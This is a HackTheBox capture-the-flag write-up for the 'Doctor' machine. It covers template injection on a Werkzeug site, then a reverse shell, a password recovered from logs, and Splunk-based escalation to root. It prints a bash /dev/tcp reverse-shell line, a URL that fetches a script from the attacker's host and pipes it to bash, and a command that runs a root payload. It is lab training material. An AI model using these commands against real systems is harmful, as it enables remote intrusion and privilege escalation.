HackTheBox - Doctor

Foothold

Nmap scan (open ports)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

$ nmap -min-rate 5000 --max-retries 1 -sC -sV -p- 10.10.10.209
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-16 10:19 CET
Nmap scan report for doctors.htb (10.10.10.209)
Host is up (0.094s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
|   256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_  256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
| http-server-header: 
|   Apache/2.4.41 (Ubuntu)
|_  Werkzeug/1.0.1 Python/3.8.2
| http-title: Doctor Secure Messaging - Login
|_Requested resource was http://doctors.htb/login?next=%2F
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Apache httpd 2.4.41 (port 80)

When we go to http://10.10.10.209/, one of the first thing we can notice is:

After adding doctors.htb to /etc/hosts we have a totally different page:

SSTI (Server Side Template Injection)

If we check the source code of the main page, we can see there is a link to http://doctors.htb/archive (which is commented):

After trying many types of injections in http://doctors.htb/post/new, we can figure out that the website is vulnerable to templates injections.

As we can see:

The payload above leads to this render result in http://doctors.htb/archive

Now let’s do a reverse shell.

Reverse shell

Thanks to the payload above, we can now call give to http://doctors.htb/archive another GET parameter: “include”.

1

We inject python templates because the target server is a Werkzeug server version 1.0.1 using Python version 3.8.2

This parameter takes a shell command that we want to run, for instance ls:

In order to have a reverse shell, I created a file called reverse.sh:

1

bash -i >& /dev/tcp/10.10.14.9/4444 0>&1

On my machine, I ran an HTTP Server:

1

$ python3 -m http.server

If we type this URL on our browser, we have access to a shell on the target server with the user web:

http://doctors.htb/archive?input=wget -O - http://10.10.14.9:8000/reverse.sh | bash

User (shaun)

There is another user on the machine: shaun.

1
2
3
4
5
6
7

web@doctor:~$ cd /home
web@doctor:/home$ ls
shaun
web
web@doctor:/home$ cd shaun
web@doctor:/home/shaun$ ls
user.txt

I used linpeas.sh, then I saw this interesting log:

1
2
3
4
5
6
7
8
9
10
11

web@doctor:/var/backups$ su - shaun
su - shaun
Password: Guitar123
id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
# Spawning a TTY Shell
python3 -c "import pty; pty.spawn('/usr/bin/bash')"
shaun@doctor:~$
shaun@doctor:~$ cat user.txt
cat user.txt
0d5dec4a853e2f82567c3d0792b7a679

Root

Remember nmap scan ? We saw that splunk is currently running on the target sever:

By looking for “splunk privilege escalation”, we find this repo https://github.com/cnotin/SplunkWhisperer2.

PySplunkWhisperer2_remote.py allows us to run a remote payload as root:

Payload: python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.9 --username shaun --password Guitar123 --payload "cat /root/root.txt > /dev/shm/flag; chmod 444 /dev/shm/flag"

Finally we got the flag:

Useful links

• PayloadsAllTheThings - Server Side Template Injection
• SplunkWhisperer2